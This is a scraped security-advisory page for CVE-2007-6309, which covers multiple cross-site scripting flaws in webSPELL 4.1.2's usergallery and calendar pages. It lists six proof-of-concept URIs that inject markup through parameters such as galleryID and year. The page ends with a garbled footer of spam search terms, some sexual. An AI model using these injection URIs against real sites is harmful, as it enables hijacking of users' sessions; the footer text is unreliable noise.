exploits , vulnerabilities , articles , webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
| Title |
webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2007-12-10-12:00AM |
| Updated |
2008-01-03-02:10PM |
| Class |
Input Validation Error |
| CVE |
CVE-2007-6309 |
| Remote |
Yes |
| Local |
No |
| Credit |
Brainhead is credited with the discovery of these vulnerabilities. |
| Vulnerable |
webSPELL webSPELL 4.1.2
|
| Not Vulnerable |
|
| Code |
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code] http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code] |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 22 Nov 2008 05:17:54 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
%2Findex.p ip+board+2 Sex in asi t505t www.indiap CMS is Fre Www.sexrap www.srt8up www.indiap SEXtv1 PHP 5.1.6 www.89.c0m www.tzssny 200 /compo news for c image geir t114t Cerita sex free telug www.bollyw britny spe php-nuke 2 WWW.FREEPO php-nuke 2 WWW.FREEPO www namit SEX WWLPEP WHMCS www.worl.s www.tz-cy. www.worl.s t509t WWW.ENTELW awstat CMS is Fre www89.com adult sexy CMS is Fre CMS is Fre mambo Remo PHON EROTI web wiz fo photo sex www.Sex+wa gambar ade /modules/M nudegirl mambo Remo sex10 /search/ex
|